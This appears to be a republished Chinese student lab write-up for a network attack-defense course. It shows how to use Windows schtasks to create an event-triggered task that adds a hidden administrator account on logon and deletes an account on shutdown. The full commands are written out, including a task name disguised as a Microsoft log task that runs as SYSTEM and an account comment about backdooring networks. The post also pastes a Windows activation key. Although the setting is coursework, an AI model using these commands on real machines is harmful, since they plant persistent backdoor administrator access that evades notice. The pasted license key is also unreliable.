网络攻防任务二:开机关机事件触发账户的创建与删除

Posted cyx-b

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了网络攻防任务二:开机关机事件触发账户的创建与删除相关的知识,希望对你有一定的参考价值。

 

一、任务要求

设计一个以开机、关机事件为触发条件的计划任务,实现:

1、开机时新建一个用户

2、关机时删除用户

 技术图片

 

二、解决步骤

(一)实验环境搭建

事件触发的命令是schtasks

利用schtasks完成的功能主要是:利用确定的日志事件触发net user命令,以达到新增一个管理员账户的目的。

如果利用传统的at命令,首先无法用日志事件触发,其次需要执行多条命令行时,只能将它们编写成.bat的批处理文件进行处理

 

由于要用到事件触发,xp没有这个功能,所以要新建一个win7的虚拟机。

Win7激活秘钥为YKHFT KW986 GK4PY FDWYH 7TP9F

 

(二)开机创建用户

Schtasks的用法描述:

 

    允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任

    务。

 

参数列表:

    /Create         创建新计划任务。

 

    /Delete         删除计划任务。

 

    /Query          显示所有计划任务。

 

    /Change         更改计划任务属性。

 

    /Run            按需运行计划任务。

 

    /End            中止当前正在运行的计划任务。

 

    /ShowSid        显示与计划的任务名称相应的安全标识符。

 

    /?              显示此帮助消息。

 

Examples:

    SCHTASKS

    SCHTASKS /?

    SCHTASKS /Run /?

    SCHTASKS /End /?

    SCHTASKS /Create /?

    SCHTASKS /Delete /?

    SCHTASKS /Query  /?

    SCHTASKS /Change /?

    SCHTASKS /ShowSid /?

 

开机事件的事件ID4624,因此代码如下:

schtasks /create /tn "Microsoft\\Windows\\LocalEventLogRotate" /tr "\\"cmd.exe\\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\\"Built-in account for Backdooring your network suckers\\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name=‘Microsoft-Windows-Security-Auditing‘] and EventID=4624]]"

直接在命令行窗口下输入这行代码即可。

 技术图片

 

 

 

技术图片

 

 

 

 

重启的时候有登录窗口,原因是关机的时候账户未删。

 技术图片

 

 

 

 

(三)关机删除用户

经查询关机事件ID1074

代码如下:

schtasks /create /tn "Microsoft\\Windows\\LocalEventLog" /tr "\\"cmd.exe\\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

关机之前先检查一下账户情况

 技术图片

 

 

 

 

重启之后,结果如下图所示,账户已被删除。

 技术图片

 

 

 

开机后,再输入net user,可以看到账户在开机之后也建立成功了。

 技术图片

 

以上是关于网络攻防任务二:开机关机事件触发账户的创建与删除的主要内容,如果未能解决你的问题,请参考以下文章

《内网安全攻防:渗透测试实战指南》读书笔记:内网信息收集

如何查看电脑关机记录?

WIN10计划任务创建的计划无法修改或者删除怎么办?

#20155235 《网络攻防》 实验二 后门原理与实践

网络管理如何查看电脑开机、关机记录

网络攻防对抗技术 实验报告二